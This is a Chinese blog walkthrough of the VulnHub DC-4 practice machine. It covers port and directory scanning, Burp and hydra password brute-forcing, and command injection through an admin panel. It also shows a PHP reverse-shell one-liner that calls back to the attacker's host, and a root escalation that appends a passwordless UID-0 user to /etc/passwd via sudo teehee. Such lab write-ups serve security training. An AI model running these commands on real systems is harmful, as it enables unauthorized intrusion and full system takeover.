VulnHub 靶机学习No.5 DC-4

最新推荐文章于 2022-04-04 23:51:57 发布
最新推荐文章于 2022-04-04 23:51:57 发布
阅读量164 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gh0stf1re/article/details/108905472
版权

本篇博客的主要内容

VulnHub 靶机学习No.5 DC-4

靶机运行说明

  • 靶机难度:初级至中级
  • 攻击机:kali linux,ip地址:192.168.56.102
  • 靶机:DC-4,IP地址:192.168.56.109
  • 目标:找到终极flag

信息收集

只开启 kali 和 DC-4,使用nmap扫描kali所在的C段,得知 DC-4 的ip为192.168.56.109
在这里插入图片描述
进行全端口扫描,发现22端口开启ssh服务,80端口开启http服务
在这里插入图片描述
利用 whatweb 看看web服务有哪些特征

whatweb http://192.168.56.109

没发现什么有价值的东西
在这里插入图片描述
访问一波,直接是一个后台登录页面
在这里插入图片描述
dirb,跑一波目录
在这里插入图片描述
只有默认页面(也就是刚才提到的后台登录页面)
dirsearch 跑一哈

python3 dirsearch.py -u "http://192.168.56.109" -e php -w "dics_cn/ext/directory-list-2.3-small.txt"

然而并没有扫出太有价值的东西
在这里插入图片描述
加大字典,再跑一跑

python3 dirsearch.py -u "http://192.168.56.109" -e php -w "dics_cn/ext/directory-list-2.3-medium.txt"

结果一样
在这里插入图片描述
之后在登录页尝试万能密码,无用。查看源代码,无有用信息,sqlmap跑了一下,没有sql注入。瞬间犯难。只能尝试爆破了:
(我的kali没有安装破解版burp,所以这里用本机的burpsuite来进行爆破操作)
密码字典使用rockyou.txt,用户字典就设置简单点:admin、master、system、webmaster。出乎意料的是,很快就跑出了一对用户名/密码:admin/happy
在这里插入图片描述

命令执行尝试弹shell(但失败)

成功登录之后,发现可以选择执行3条命令。尝试抓包更改命令,发现修改之后同样可以执行
在这里插入图片描述
在这里插入图片描述
尝试反弹shell
kali监听4444端口

nc -lvvp 4444

在这里插入图片描述
然而,并没能成功弹shell。怀疑会不会是&以及> 造成了干扰?echo打包,bash执行试试
在这里插入图片描述
然而,没能成功弹shell。由于本身网站就是使用php来写的,所以肯定是安装了php的,那么能否利用php来弹shell呢?参考文章:https://xz.aliyun.com/t/5768

php -r '$sock=fsockopen("192.168.56.102",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

依然没能反弹成功,绝望.jpg
在这里插入图片描述
命令执行这条路我是走不通了,如果有大佬通过命令执行弹shell成功了,或者知道这条路走不通的原因,欢迎赐教。

峰回路转

发现3个uid大于1000的用户
在这里插入图片描述
在他们家翻箱倒柜,终于找到了点好东西
在这里插入图片描述
右边输出的old-passwords就是我们爆破的好字典啊(22端口开着,进行ssh爆破)

hydra -l jim -P old_password.txt 192.168.56.109 ssh -t 8

爆破成功,密码为:jibril04
在这里插入图片描述
成功利用ssh登录jim的账号

提权

LinEnum.sh 来一波?
具体过程之前几个靶场写过遍了。再描述一遍,加深印象

  • kali 存放脚本的目录处,开终端,利用python起http服务
  • 与靶机交互的终端,切换到靶机的/tmp,下载脚本,加执行权限,执行输出
    在这里插入图片描述
    居然提示我有一封新的邮件,这是官方提示啊,必须看看。charles给出了自己的密码:
    在这里插入图片描述
    su 一下,su 一下
    在这里插入图片描述
    这时候执行LinEnum.sh
    输出结果给了我们提权方法
    在这里插入图片描述
    teehee命令可以写入文件内容并不覆盖文件原有内容
    使用teehee命令将一个无密码用户miao写入到/etc/passwd文件,并加入到root组中
echo "miao::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su miao

成功拥有root权限,去/root目录下查看flag即可
在这里插入图片描述

知识点总结

  • 命令执行反弹shell
  • ssh爆破
  • 信息收集,不断信息收集
  • 利用teehee提权(本质还是sudo设置的问题)

参考链接:

https://xz.aliyun.com/t/5768
https://blog.csdn.net/weixin_43583637/article/details/101556645

gh0stf1re
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub 靶机学习No.6 Bulldog
gh0stf1re的博客
10-03 309
本篇博客的主要内容VulnHub 靶机学习No.6 Bulldog靶机运行说明信息收集利用 bash 弹shell提权知识点总结参考链接: VulnHub 靶机学习No.6 Bulldog 靶机运行说明 靶机难度:初级至中级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-4,IP地址:192.168.56.101 目标:找到终极flag 信息收集 BullDog 靶机直接显示了IP地址:192.168.56.101 使用 nmap 对其进行全端口扫描 nmap -s
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5941
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
vulnhub--Chill Hack
weixin_45922278的博客
02-07 243
靶场描述 难度:容易/中级 标记:2(用户和root) 提示:枚举 目录 一、信息收集 1.nmap端口扫描: 2.dirsearch目录扫描: 二、漏洞探测 三、漏洞利用 四、提权 1.sudo -l 2.寻找其他漏洞: 1)hacker.php 2)steghide工具 3)ARCHPR 爆破密码 4)lse.sh Linux枚举工具 5)docker提权: 五、总结 一、信息收集 1.nmap端口扫描: nmap -sP 192.168.155.129/..
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3145
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
VulnHub-IMF-靶机渗透学习
嗯嗯呐的博客
11-26 2919
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志都包含下一个标志的提示。我希望您喜欢这个虚拟机并学到一些东西。 目标:得到root权限&找到六个flag.txt 作者:嗯嗯呐 目录信息收集PHP数组绕过getshell缓冲区溢出提权总结 信息收集 Nmap
VulnHub】breach1.0之技术积累
redwand的博客
03-08 846
这是一个中级难度的靶场,本打算按照前面的思路把流程写一下,最终决定只总结一下个人在此靶场渗透过程中遇到的难点与收获。
VulnHub 靶机学习No.4 DC-3
gh0stf1re的博客
09-30 244
本篇博客的主要内容VulnHub 靶机学习No.4 DC-3靶机运行说明信息收集提权知识点总结参考链接: VulnHub 靶机学习No.4 DC-3 靶机运行说明 靶机难度:初级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-3,IP地址:192.168.56.106 目标:找到终极flag 信息收集 仅开启kali和DC-3靶机,使用nmap扫描kali所在C段,确认192.168.56.106为靶机的ip 进行全端口扫描,发现其仅开放80端口的http服务 使
VulnHub 靶机学习No.3 DC-1
gh0stf1re的博客
09-29 238
本篇博客的主要内容VulnHub 靶机学习No.3 DC-1靶机运行说明信息收集提权知识点总结参考链接: VulnHub 靶机学习No.3 DC-1 靶机运行说明 靶机难度:初级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-1,IP地址:192.168.56.107 目标:找到5个flag 信息收集 nmap扫描kali所在C段,得到DC-1的ip为192.168.56.107 对192.168.56.107进行全端口扫描 nmap -sV -p 1-65535
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4774
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 221
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1596
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4653
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7677
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
CVE-2018-15473(ssh用户名枚举)漏洞复现(避坑)
gh0stf1re的博客
09-17 6378
CVE-2018-15473 漏洞复现 前言 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 复现过程 克隆poc脚本到本地 git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git (注意:该脚本使用python3编写) 安装依赖库: pip3 install -r requirements.txt 运行脚本 root@kali:~/Desktop/CVE-2018-
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 5893
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
三个代码执行漏洞的复现
gh0stf1re的博客
04-04 5573
CNVD-2021-30167(用友NC BeanShell远程代码执行) CVE-2019-0193(Apache Solr Velocity模板注入RCE) CVE-2020-14882(Weblogic Console远程代码执行漏洞)
Ubuntu用户提权CVE-2021-3493漏洞复现
gh0stf1re的博客
04-27 2731
1.漏洞摘要 Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 CVE-2021-3493 linux内核中的overlayfs实现未就用户名称空间正确验证底层文件系统中文件的文件功能设置。由于无特权的用户名称空间以及Ubuntu内核中附带的允许无特权的覆盖挂载的补丁的组合,攻击者可以使用它来获得提升的特权,内核中的o
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值